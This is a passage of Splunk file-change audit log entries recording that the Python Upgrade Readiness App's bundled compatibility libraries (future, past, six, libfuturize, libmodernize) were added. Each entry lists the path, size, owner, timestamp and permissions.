uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.866, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/pickle.py", isdir=0, size=229, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.863, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/itertools.py", isdir=0, size=158, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.859, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/http", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.855, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/html", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.849, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/dbm", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.845, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/copyreg.py", isdir=0, size=165, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.840, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/configparser.py", isdir=0, size=146, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.836, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/collections.py", isdir=0, size=417, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.830, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/builtins.py", isdir=0, size=281, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.825, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/_thread.py", isdir=0, size=163, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.820, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/_markupbase.py", isdir=0, size=171, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.816, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/_dummy_thread.py", isdir=0, size=175, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.810, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves/__init__.py", isdir=0, size=220, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.605, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/utils", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.601, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/types", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.597, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/tests", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.592, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/standard_library", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.588, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/moves", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.582, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/builtins", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.578, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.574, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/__init__.py", isdir=0, size=2967, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.471, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/futures_then/futures_then.py", isdir=0, size=7115, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.466, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/futures_then/__init__.py", isdir=0, size=72, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.461, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/past/types/oldstr.py", isdir=0, size=4273, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.457, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/past/types/olddict.py", isdir=0, size=2721, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.453, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/past/types/basestring.py", isdir=0, size=728, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.450, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/past/types/__init__.py", isdir=0, size=879, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.445, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/past/translation/__init__.py", isdir=0, size=18417, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.439, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/past/tests/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.435, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/past/builtins/noniterators.py", isdir=0, size=9371, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.431, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/past/builtins/misc.py", isdir=0, size=2499, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.427, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/past/builtins/__init__.py", isdir=0, size=1805, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.322, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/past/utils/__init__.py", isdir=0, size=2633, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.319, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/past/utils", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.316, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/past/types", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.312, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/past/translation", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.309, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/past/tests", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.305, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/past/builtins", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.302, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/past/__init__.py", isdir=0, size=2943, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.299, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/builtins/__init__.py", isdir=0, size=493, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.295, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/futures_then-0.1.1.dist-info/top_level.txt", isdir=0, size=13, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.291, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/futures_then-0.1.1.dist-info/WHEEL", isdir=0, size=93, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.287, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/futures_then-0.1.1.dist-info/RECORD", isdir=0, size=633, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.283, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/futures_then-0.1.1.dist-info/METADATA", isdir=0, size=869, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.278, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/futures_then-0.1.1.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.173, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/six-1.12.0.dist-info/top_level.txt", isdir=0, size=4, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.169, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/six-1.12.0.dist-info/WHEEL", isdir=0, size=110, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.164, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/six-1.12.0.dist-info/RECORD", isdir=0, size=529, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.160, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/six-1.12.0.dist-info/METADATA", isdir=0, size=1940, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.155, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/six-1.12.0.dist-info/LICENSE", isdir=0, size=1066, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.151, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/six-1.12.0.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.147, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_xrange_with_import.py", isdir=0, size=479, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.143, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_unicode_literals_import.py", isdir=0, size=367, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.138, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_unicode_keep_u.py", isdir=0, size=779, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.134, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_remove_old__future__imports.py", isdir=0, size=851, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.130, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_raise.py", isdir=0, size=2167, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.126, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_print_with_import.py", isdir=0, size=735, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.122, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_print.py", isdir=0, size=3384, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.118, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_order___future__imports.py", isdir=0, size=829, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.113, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_oldstr_wrap.py", isdir=0, size=1214, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.109, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_object.py", isdir=0, size=407, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.104, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_next_call.py", isdir=0, size=3158, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.100, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_metaclass.py", isdir=0, size=9568, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.096, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_future_standard_library_urllib.py", isdir=0, size=1001, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.093, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_future_standard_library.py", isdir=0, size=733, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.088, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_future_builtins.py", isdir=0, size=2027, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.085, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_execfile.py", isdir=0, size=921, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.081, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_division_safe.py", isdir=0, size=3460, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.078, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_division.py", isdir=0, size=228, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.074, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_cmp.py", isdir=0, size=701, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.071, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_bytes.py", isdir=0, size=685, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.067, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_basestring.py", isdir=0, size=394, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.062, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_add__future__imports_except_unicode_literals.py", isdir=0, size=662, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.059, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_absolute_import.py", isdir=0, size=3140, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.054, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/fix_UserDict.py", isdir=0, size=3840, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:41.049, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes/__init__.py", isdir=0, size=5141, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.742, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/main.py", isdir=0, size=13733, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.738, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixes", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.734, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/fixer_util.py", isdir=0, size=17494, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.727, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libfuturize/__init__.py", isdir=0, size=31, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.723, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_zip.py", isdir=0, size=560, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.718, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_xrange_six.py", isdir=0, size=545, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.713, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_urllib_six.py", isdir=0, size=8835, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.708, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_unicode_type.py", isdir=0, size=384, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.703, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_unicode_future.py", isdir=0, size=356, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.699, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_unicode.py", isdir=0, size=653, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.694, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_unichr.py", isdir=0, size=473, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.686, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_raise_six.py", isdir=0, size=800, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.682, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_raise.py", isdir=0, size=794, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.674, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_print.py", isdir=0, size=317, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.670, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_open.py", isdir=0, size=408, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.667, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_next.py", isdir=0, size=658, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.662, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_metaclass.py", isdir=0, size=8616, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.659, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libmodernize/fixes/fix_map.py", isdir=0, size=634, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:40.656, user=n/a, 